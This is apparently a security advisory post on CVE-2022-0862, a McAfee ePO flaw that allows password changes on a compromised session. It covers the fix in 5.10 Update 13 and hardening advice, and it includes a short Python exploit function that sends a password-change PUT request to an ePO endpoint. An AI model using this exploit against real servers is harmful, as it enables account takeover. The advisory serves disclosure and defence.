A recently discovered vulnerability in a deprecated API of McAfee Enterprise ePolicy Orchestrator (ePO), identified as CVE-2022-0862, allows a remote attacker to change the password of a compromised session without needing to know the existing user's password. This security flaw impacts ePO versions prior to 5.10 Update 13, and though it was resolved with the release of ePO 5.10 Update 13, it's important to analyze the issue in detail to understand its implications and the steps taken to mitigate the risk.

The Vulnerability

The lack of password change protection vulnerability exists in a deprecated API used by ePO. This API allowed remote attackers to change passwords by making use of an active and compromised session. To exploit this vulnerability, an attacker would not require the knowledge of the user's existing password.

The affected functionality was removed from the user interface in ePO 5.10 Update 13, while the API was disabled to prevent further exploitation. However, systems still using ePO versions prior to 5.10 Update 13 remain susceptible to the vulnerability.

To emphasize the risks associated with this vulnerability, let's see a code snippet that demonstrates the potential impact of this security flaw:

import requests

session = requests.Session()
session.verify = False

def exploit_vulnerability(session, epo_url, username, new_password):
    payload = f"userName={username}&Password={new_password}"
    response = session.put(f"{epo_url}/remote/ADUserContext.do?command=updatePassword", data=payload)

    if response.status_code == 200:
        print("Password change successfully exploited!")
    else:
        print("Failed to exploit the vulnerability")

Exploit Details

The exploit detailed above leverages the vulnerability by sending a PUT request to the "/remote/ADUserContext.do?command=updatePassword" endpoint of the targeted ePO server. The payload includes the desired username and a new password, while the old password is not needed. If the session has been successfully compromised, the password change request will be accepted, and the attacker will gain unauthorized access to the user's account.

This vulnerability has been assigned a CVE identifier of CVE-2022-0862, which can be explored on the official National Vulnerability Database (NVD) website.

In addition to disabling the deprecated API, McAfee has implemented other protection mechanisms to reduce the likelihood of this vulnerability being exploited through sending a link to a logged-in user.

Recommendations

Users of McAfee ePO are advised to update their software to the latest version, ePO 5.10 Update 13, to prevent any potential exploitation of this vulnerability. Additionally, implement robust security practices:

Employ multi-factor authentication to secure sensitive access points

- Educate users about identifying and protecting against potential phishing and social engineering attacks

Conclusion

This vulnerability, CVE-2022-0862, is a reminder of the importance of staying up-to-date with security patches and maintaining a strong cybersecurity posture. By updating ePO to the latest version and following best practices for secure systems administration and user awareness, organizations can safeguard their assets from potential exploitation.

Timeline

Published on: 03/23/2022 15:15:00 UTC
Last modified on: 03/29/2022 01:12:00 UTC